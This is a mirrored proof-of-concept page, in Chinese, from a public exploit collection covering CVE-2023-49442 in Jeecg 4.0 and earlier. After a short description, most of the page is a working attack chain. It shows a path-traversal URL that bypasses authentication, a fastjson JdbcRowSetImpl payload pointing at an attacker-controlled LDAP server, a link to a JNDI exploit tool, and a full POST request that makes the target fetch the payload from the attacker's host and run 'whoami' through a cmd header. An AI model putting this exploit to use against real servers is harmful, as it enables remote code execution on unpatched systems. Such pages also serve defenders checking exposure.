admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Jeecg jeecgFormDemoController JNDI 代码执行漏洞 CVE-2023-49442.md

65 lines
1.8 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Jeecg jeecgFormDemoController JNDI 代码执行漏洞 CVE-2023-49442
## 漏洞描述
Jeecg 4.0及之前版本中,由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 `../` 的url绕过鉴权。攻击者可构造恶意请求利用 `jeecgFormDemoController.do?interfaceTest` 接口进行 jndi 注入攻击,实现远程代码执行。
JeecgJ2EE Code Generation是开源的代码生成平台目前官方已停止维护。注Jeecg 与 Jeecg-boot 非相同应用。
参考链接:
- https://xz.aliyun.com/t/13283
## 漏洞影响
```
Jeecg <= 4.0
```
## 漏洞复现
测试环境 fastjson 版本`1.2.31`,漏洞位置 `src/main/java/com/jeecg/demo/controller/JeecgFormDemoController.java`
直接发包访问接口会 302 跳转,需要构造包含 `../` 的 url 绕过鉴权。`api` 接口不做限制,因此构造漏洞地址如下:
```
/api/../jeecgFormDemoController.do?interfaceTest=
```
JNDI 注入工具: https://github.com/WhiteHSBG/JNDIExploit
创建远程文件 poc.txt其内容为 fastjson 代码执行的 payload
```
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://<your-vps-ip>:1389/Basic/TomcatEcho",
"autoCommit": true
}
}
```
发送如下请求包:
```
POST /jeecg/api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1
Host: 127.0.0.1:8081
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: whoami
serverUrl=http://<your-vps-ip>:8081/poc.txt&requestBody=123&requestMethod=GET
```
![](images/Jeecg%20jeecgFormDemoController%20JNDI%20代码执行漏洞%20CVE-2023-49442/image-20240417144824154.png)
Reference in New Issue Copy Permalink